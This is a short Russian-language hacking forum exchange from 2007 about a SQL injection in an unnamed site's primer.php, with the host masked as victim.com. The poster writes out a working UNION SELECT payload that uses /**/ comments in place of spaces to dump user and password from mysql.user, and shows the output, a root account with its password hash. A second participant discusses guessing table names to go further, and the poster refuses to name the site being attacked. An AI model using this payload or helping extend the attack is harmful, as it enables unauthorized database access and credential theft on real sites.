17.10.2007, 10:16
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
вообщем вот, скул-инъекция нашлась тут
http://victim.com/primer.php?aa=99999&rc=-1'
после запроса в mysql.user с параметрами user,password дает следующее
url:http://victim.com/primer.php?aa=99999&rc=-1'/**/union/**/select/**/0,2,user,password/**/from/**/mysql.user/**/limit/**/0,1/*
1. root — 72f840f85cf3bb40
ты когда выполняешь user() у тебя что выводится?
название_сайта@localhost
Код:
Ну ты сказал ты б хоть сайт тогда назвал а так фиг придумаешь таблички
по некоторым причинам не могу расглошать... |
|
|